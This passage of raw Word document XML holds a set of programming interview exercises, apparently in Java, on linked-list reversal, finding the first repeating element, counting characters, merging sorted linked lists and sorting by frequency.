    <w:p w14:paraId="5970235B" w14:textId="226BB2A4" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="348" w:name="_Toc197867562"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00786506" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00205CE3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00786506" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>everse a singly linked list</w:t>
      </w:r>
      <w:bookmarkEnd w:id="348"/>
    </w:p>
    <w:p w14:paraId="04AB129D" w14:textId="326CDDC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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Node class to represent each element in the linked list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3171F61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A6B1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50EBBEB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F00D03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FD3D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node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AF02F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11EDC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3FDD190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015307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F18E7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8F426E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854F6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4C47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B31E81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A1928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singly linked list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257FD6A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5BB88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DC34C1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084BE76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2F91F5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49DB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3E73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ore the next node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0819685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1C3CE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DAE3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current node's pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4B579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446C5F4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8FE06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ove the prev and curr pointers one step forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A1102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p>
    <w:p w14:paraId="6BF4C91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8D3179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3C407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0E0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fter the loop, prev will be the new head</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7242C96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0736642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AD8BF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DFE5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006752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E6143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3A13C1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8B57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BB981D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6B5DCA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E050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57481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8BFFF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E8CE6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add a node at the end of the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584212B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appen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4C8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newN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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730F598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B914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1E30170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5F0F62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146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2F8F56F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90B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B1BE2D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D9EDC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5E82DFE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566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CF1F0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6490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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8B6FB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8F2A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some elements to the list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4092D02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B486B4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448F12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57C43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2B0EB55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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E508CB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336A2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List:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067D199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084B76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003D6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linked list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E41BCE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6AF944E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D65C4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List:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759E75A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5B1405C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8ABA4" w14:textId="1F48D1B3"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A402CB" w14:textId="77777777" w:rsidR="00786506" w:rsidRPr="00CE4B95" w:rsidRDefault="00786506" w:rsidP="00786506">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67A70347" w14:textId="582ACC78" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="349" w:name="_Toc197867563"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00F22C1F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – First repeating number</w:t>
      </w:r>
      <w:bookmarkEnd w:id="349"/>
    </w:p>
    <w:p w14:paraId="0D35B54E" w14:textId="7569DFFE" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239" w:rsidP="008E1319">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EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to print the first occurrence of a repeating element from integer Array?</w:t>
      </w:r>
      <w:r w:rsidR="00760106" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Input</w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: [6,10,7,8,9,7,11,12]</w:t>
      </w:r>
      <w:r w:rsidR="00760106" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60792423" w14:textId="325964F8"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49A16CD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D87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Repeating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129E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D1389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find and print the first repeating element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C73EE9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5D202"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 to store elements we have already seen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA6499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52627F9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C5E49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array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDECCF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B143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element is already in the set, it's the first repeating element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F2BFF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BB65F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repeating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28435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it as we found the first repeating element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B487F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05BED"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element to the set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D638D7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e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0F368C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C1C9D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69D44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repeating element is found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7201ECC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repeating element found."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE57C96"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E96EB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4955B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A5B9F"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array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D49AC3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7E5FADF0"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A0BD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find and print the first repeating element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9B9E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16C0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1DD1DD" w14:textId="3FC7BDAC"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747F8357" w14:textId="77777777" w:rsidR="00EA59B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA59B7" w:rsidP="00EA59B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12FF10DD" w14:textId="405CDFA9" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="350" w:name="_Toc197867564"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00CE00E5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Print occurrence of each character in String</w:t>
      </w:r>
      <w:bookmarkEnd w:id="350"/>
    </w:p>
    <w:p w14:paraId="01965D9E" w14:textId="6238C7DE" w:rsidR="00AE3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00AE3A76">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00AE3A76" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Write a program to print occurrence of each character in the given string </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E36B012" w14:textId="5BF1F91B" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00AE3A76" w:rsidP="00AE3A76">
      <w:pPr>
        <w:ind w:left="1800" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Example: String str = "This is an interview is going on with Amdocs";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730D8ECF" w14:textId="7AC5CB0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F2AB5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A47A6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F8B20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D2DD5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occurrence of each character in the string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3081EC7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59118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character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B025DC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4D39C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2E00A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tring to an array of characters and iterate over it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DBA08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A9DB6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optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03536E3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B7165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4E1D01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8193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CCC5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68129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occurrence of each character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9F68F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B2B8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3123C7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6EB0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92B1F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C370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C5C1E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string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AABE7A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an interview is going on with Amdocs"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE3A9E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F98C10"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print character occurrences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7EFB6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p>
    <w:p w14:paraId="65809EF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986AC" w14:textId="4239F629"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2EFA61" w14:textId="77777777" w:rsidR="00621D18" w:rsidRPr="00CE4B95" w:rsidRDefault="00621D18" w:rsidP="00621D18">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E92F575" w14:textId="17A91979" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="351" w:name="_Toc197867565"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00E111CA" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Merge two sorted linked list</w:t>
      </w:r>
      <w:bookmarkEnd w:id="351"/>
    </w:p>
    <w:p w14:paraId="46DF6D62" w14:textId="7A1163AE"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Merge two sorted linked lists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5BCC03" w14:textId="0936E905"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list1 = 10, 20,30,40;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAE3753" w14:textId="36697ABE" w:rsidR="00055F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00055F96" w:rsidP="00055F96">
      <w:pPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">            list2 = 11,13,14,21,22,33,35;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7FD178" w14:textId="0796AD68"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Output: Mergedlist = 10,11,13,20,21,22,30,33,35,40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04742751" w14:textId="038C331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lastRenderedPageBreak/>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36EB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4DBFAC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4630DE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DCE95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EFDC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0F017A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55C7611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E494E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p>
    <w:p w14:paraId="483080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C4B6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rgeSortedLinkedLis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D9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EAC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merge two sorted linked lists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FC75B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263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dummy node to simplify the process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57933C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dumm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85455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p>
    <w:p w14:paraId="01C19C4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4434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inters for both lists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E6CB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p>
    <w:p w14:paraId="0E096A40"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1A3DE4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78DAF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both lists and merge them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7608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2A78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57D5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15A6BA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855B3D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0B27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92A7E8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E43F27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B932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EE4297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183D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ED24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re are remaining nodes in list1 or list2, append them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029C42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AA10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7A43D82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7F20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6C9D210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08061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F965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rged list starts from dummy.next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D96B76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07E98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6AF7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6BD656B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ADA9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930C0C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6057A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11069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DA5A16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2E60E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898B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17AF2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80D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reate a linked list from an array of integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0FD5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8B71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78C023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3F10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79B02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668011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FEBFD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1E11CDC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C103A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9236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554D9FF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FE3E0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9EDCC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887B4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lists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EE73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0EDDD9A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p>
    <w:p w14:paraId="6FF4263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4B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linked lists from arrays</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDB25A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Array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4047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2Array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0310EAB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09E9D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rge the two sorted linked lists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065DACA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52B4C28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7A2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merged linked list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034823A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rged List: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018BC99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ergedList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC20B4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512C4" w14:textId="39F16DB0"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07A88" w14:textId="77777777" w:rsidR="009F7DB6" w:rsidRPr="00CE4B95" w:rsidRDefault="009F7DB6" w:rsidP="009F7DB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12A31A22" w14:textId="255E1406" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="352" w:name="_Toc197867566"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="0015412A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Sort array with decreasing frequency of element</w:t>
      </w:r>
      <w:bookmarkEnd w:id="352"/>
    </w:p>
    <w:p w14:paraId="162E477F" w14:textId="630DD308"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Sort array with decreasing frequency of element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC30A7D" w14:textId="77777777"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 9,5,6,9,6,1,.2,9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAA6CAD" w14:textId="447623B1" w:rsidR="00055F96" w:rsidRPr="00CE4B95" w:rsidRDefault="00055F96" w:rsidP="00055F96">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Output - 9,9,9,6,6,1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08798F02" w14:textId="6FEC37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14B4E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5E70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rtBy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D3A3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ED95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sort the array by the frequency of elements in decreasing order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA4F9D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122E3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2D82A2E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7B166D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C332E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8497D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C2F23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0D32E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B099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025F6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map entries to a list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2011ADF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ent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p>
    <w:p w14:paraId="614B5F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3A7267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D11A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54AE4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308C8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228B49A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5006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reqComparison</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733E4C5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043B7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259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build the sorted array based on the sorted entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD4970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FB3D59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1501A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ED45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4296C7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BE81A"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8405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4F0F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orted list back to an array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025C2B5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24F8522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43A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6F8D24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C23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2EB30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p>
    <w:p w14:paraId="5D98177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6E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0322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array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A1B18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2559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F3A0D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F6DF98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A63F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1EA9F63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575C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89F66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BF1D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28E1145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DD5251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FCD00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array based on frequency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C4786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4AD5B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4A07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array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BD232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Array: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF9E62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Array</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6100653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92D74F" w14:textId="39BC34F2" w:rsidR="0015412A" w:rsidRPr="00CE4B95"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998CDF" w14:textId="77777777" w:rsidR="0015412A" w:rsidRPr="00CE4B95" w:rsidRDefault="0015412A" w:rsidP="0015412A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D3C81C5" w14:textId="62C28C66" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00550E5B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="353" w:name="_Toc197867567"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
